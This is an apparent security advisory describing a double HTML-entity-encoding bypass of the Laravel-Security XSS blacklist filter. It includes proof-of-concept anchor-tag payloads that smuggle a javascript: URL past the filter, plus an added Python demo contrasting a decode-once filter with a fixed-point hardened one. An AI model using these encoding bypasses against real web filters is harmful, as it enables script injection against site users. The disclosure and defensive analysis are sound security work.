Laravel-Security XSS Filter Bypass
Posted on 30 April 2014
#Product: Laravel-Security XSS Filter Bypass
#Vulnerability: Mutation Based XSS Bypass
#Impact: Medium/High
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: http://rhainfosec.com
#Status: Fixed

=========
Description
=========

Laravel-Security is a port of the security class from CodeIgniter 2.1 to Laravel 4.1. It takes a blacklist approach: input is matched against patterns for known malicious constructs, and whatever matches is stripped or rejected.

=========
Vulnerability
=========

The XSS filter decoded HTML entities in the input before applying its blacklist, and returned the decoded string. Because the blacklist ran after exactly one decoding pass, a payload whose dangerous part was entity-encoded twice survived that pass in a form the blacklist did not recognise. The browser then decoded the character references a second time when it parsed the attribute, restoring executable JavaScript.

=============
Proof of concept
=============

During the initial test the following input was supplied, with the javascript: URL written as decimal character references:

<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

The filter decoded the entities, which exposed the payload to the blacklist, and the attack was blocked. After decoding:

<a href="javascript:confirm(1)">Clickhere</a>

Next, the entities were double encoded, that is, the ampersand of each character reference was itself encoded as &amp;:

<a href="&amp;#106&amp;#97&amp;#118&amp;#97&amp;#115&amp;#99&amp;#114&amp;#105&amp;#112&amp;#116&amp;#58&amp;#99&amp;#111&amp;#110&amp;#102&amp;#105&amp;#114&amp;#109&amp;#40&amp;#49&amp;#41">Clickhere</a>

Since the filter decodes the entities only once, its output is:

<a href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

The blacklist never sees the literal string javascript:, so nothing is removed. When the browser parses the href attribute it decodes the character references again (numeric references are decoded with or without a trailing semicolon), which yields:

<a href="javascript:confirm(1)">Clickhere</a>

This is valid syntax in the href context and executes JavaScript when the link is clicked.

===
Fix
===

The vulnerability has been fixed: the latest version doesn't decode HTML entities, and hence this attack is mitigated. The general lesson is that a blacklist applied after a single normalisation pass is a canonicalisation bug; a pattern match must run against the fully normalised form (or not normalise at all and rely on contextual output encoding), otherwise each extra encoding layer is another bypass.

==========
References
==========

https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413
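The decode-once behaviour behind the bypass, as an added example that is not the Laravel-Security code and not taken from the advisory: a stand-in filter that decodes HTML entities one time, blacklists the javascript: scheme and returns the decoded text; a model of the browser decoding the href attribute (Python's html.unescape follows the HTML5 rules, so numeric references without a trailing semicolon decode just as the advisory relies on); and, as an assumed hardening rather than the project's actual fix, a filter that decodes to a fixed point before matching. The function names, the single blacklist rule and the payload strings are assumptions constructed for this illustration.

```python
import html
import re

# Added example, not the Laravel-Security code: minimal stand-ins for an
# entity-decoding blacklist filter plus a model of the browser's attribute
# decoding. Names, the one-rule blacklist and the payloads are assumptions.

# The only blacklist rule modelled here; the real filter has many more.
JAVASCRIPT_SCHEME = re.compile(r"javascript\s*:", re.IGNORECASE)


class Blocked(Exception):
    """Raised when a filter's blacklist matches."""


def vulnerable_xss_clean(value: str) -> str:
    """Behaviour the advisory describes: decode entities exactly once, match
    the blacklist against the decoded text, and return the decoded text."""
    decoded = html.unescape(value)
    if JAVASCRIPT_SCHEME.search(decoded):
        raise Blocked("javascript: scheme found")
    return decoded


def hardened_xss_clean(value: str) -> str:
    """Assumed hardening (not the project's fix): decode until the text stops
    changing, matching after every pass, so no finite number of encoding
    layers hides the scheme. The input is returned unchanged; encoding for
    the output context is a separate step."""
    current = value
    for _ in range(8):  # bounded: no legitimate input needs this many passes
        decoded = html.unescape(current)
        if JAVASCRIPT_SCHEME.search(decoded):
            raise Blocked("javascript: scheme found")
        if decoded == current:
            break
        current = decoded
    else:
        raise Blocked("too many encoding layers")
    return value


def browser_href(attr_value: str) -> str:
    """URL the browser navigates to: character references inside an attribute
    value are decoded, with or without a trailing semicolon (HTML5 rules,
    which html.unescape implements)."""
    return html.unescape(attr_value)


def run_payload(filter_fn, payload: str):
    """Return (blocked, url_as_seen_by_browser) for one filter/payload pair."""
    try:
        stored = filter_fn(payload)
    except Blocked:
        return True, None
    return False, browser_href(stored)


# Constructed payloads using the same decimal references as the advisory.
PLAIN = "javascript:confirm(1)"
SINGLE = "".join(f"&#{ord(c)}" for c in PLAIN)   # &#106&#97&#118...
DOUBLE = SINGLE.replace("&", "&amp;")           # &amp;#106&amp;#97...
BENIGN = "https://example.com/?a=1&amp;b=2"     # legitimate encoded link


if __name__ == "__main__":
    for name, payload in [("plain", PLAIN), ("single", SINGLE),
                          ("double", DOUBLE), ("benign", BENIGN)]:
        for fn in (vulnerable_xss_clean, hardened_xss_clean):
            blocked, url = run_payload(fn, payload)
            print(f"{fn.__name__:21} {name:6} blocked={blocked!s:5} "
                  f"browser sees {url!r}")
```

Running it shows the plain and single-encoded payloads caught by both filters, the double-encoded payload passing the decode-once filter and reaching the browser as javascript:confirm(1), and the benign link surviving both. Note that the fixed-point decoder is used only for matching; normalising the stored value itself would reintroduce the same class of problem for any later consumer that decodes again.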
